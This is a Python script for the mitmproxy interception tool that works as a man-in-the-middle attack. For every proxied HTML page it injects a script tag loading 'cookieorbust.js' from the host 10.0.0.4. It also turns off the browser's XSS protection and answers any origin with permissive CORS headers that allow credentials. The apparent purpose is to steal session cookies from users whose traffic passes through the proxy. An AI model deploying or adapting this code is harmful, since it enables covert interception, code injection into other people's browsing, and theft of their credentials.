import uuid
from libmproxy.script import concurrent

@concurrent
def request(context, flow):
     if flow.request.method in ['GET','POST'] and flow.request.host != "10.0.0.4":
     	id = uuid.uuid4().hex
     	flow.request.headers["mitm_uuid"] = [id]
     
@concurrent
def response(context, flow):
     origin = ['*']
     if 'Origin' in flow.request.headers:
	origin = flow.request.headers['Origin']

     scheme = "http://"
     #if flow.request.scheme == "https":
     #	scheme = "https://"

     if flow.request.method == 'OPTIONS':
        flow.response.headers["Access-Control-Allow-Origin"] = origin
        flow.response.headers["Access-Control-Allow-Methods"] = ['*']
        flow.response.headers["Access-Control-Allow-Headers"] = ['*']
        flow.response.headers["Access-Control-Max-Age"] = ['1728000']
        flow.response.headers["Access-Control-Allow-Credentials"] = ['true']
        flow.response.code = 200

     if 'Content-Type' in flow.response.headers and "text/html" in flow.response.headers['Content-Type'][0] and flow.request.method in ['GET','POST'] and flow.request.host != "10.0.0.4" and flow.response.code in [200, 201, 202, 203]:
     	id = flow.request.headers["mitm_uuid"];
     	flow.response.headers["Access-Control-Allow-Origin"] = origin
	flow.response.headers["X-XSS-Protection"] = ['0']
        flow.response.headers["Access-Control-Allow-Credentials"] = ['true']
        flow.response.headers["mitm_uuid"] = id;
     	flow.response.headers["P3P"] = ['CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"']
     	flow.response.replace('</body>', '<script>var mitm_uuid="%s";</script><script src="%s10.0.0.4/cookieorbust.js"></script></body>' % (id[0],scheme))
     elif flow.request.host == "10.0.0.4":
        flow.response.headers["Access-Control-Allow-Origin"] = origin
        flow.response.headers["Access-Control-Allow-Credentials"] = ['true']
	flow.response.headers["X-XSS-Protection"] = ['0']
        flow.response.headers["P3P"] = ['CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"']

